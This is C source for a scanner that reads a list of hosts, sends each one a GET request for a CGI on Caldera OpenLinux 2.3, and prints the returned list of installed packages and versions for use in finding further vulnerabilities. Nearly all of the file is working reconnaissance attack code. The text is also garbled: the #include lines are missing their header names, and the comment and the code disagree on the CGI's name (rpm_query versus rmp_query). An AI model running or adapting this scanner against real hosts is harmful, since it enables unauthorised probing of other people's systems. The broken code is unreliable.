/* rmp_query : /cgi-bin/rmp_query server scanning program. Scanner by Alhambra (slightly modified) A vulnerability exists in the default installation of Caldera OpenLinux 2.3. A CGI is installed in /home/httpd/cgi-bin/ names rpm_query. Any user can run this CGI and obtain a listing of the packages, and versions of packages, installed on this system. This could be used to determine vulnerabilities on the machine remotely. Usage: rmp_query */ #include #include #include #include #include #include #include #include #include #ifdef LINUX #include #endif #include #include #include #include #include #include int FLAG = 1; int Call(int signo) { FLAG = 0; } main (int argc, char *argv[]) { char host[100], buffer[1024], hosta[1024],FileBuf[8097]; int outsocket, serv_len, len,X,c,outfd; struct hostent *nametocheck; struct sockaddr_in serv_addr; struct in_addr outgoing; char rmpMessage[]="GET /cgi-bin/rmp_query\n"; while(fgets(hosta,100,stdin)) { if(hosta[0] == '\0') break; hosta[strlen(hosta) -1] = '\0'; write(1,hosta,strlen(hosta)*sizeof(char)); write(1,"\n",sizeof(char)); outsocket = socket (AF_INET, SOCK_STREAM, 0); memset (&serv_addr, 0, sizeof (serv_addr)); serv_addr.sin_family = AF_INET; nametocheck = gethostbyname (hosta); (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof(outgoing.s_addr)); strcpy (host, inet_ntoa (outgoing)); serv_addr.sin_addr.s_addr = inet_addr (host); serv_addr.sin_port = htons (80); signal(SIGALRM,Call); FLAG = 1; alarm(10); X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr)); alarm(0); if(FLAG == 1 && X==0) { write(outsocket,rmpMessage,strlen(rmpMessage)*sizeof(char)); while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X); } close (outsocket); } return 0; }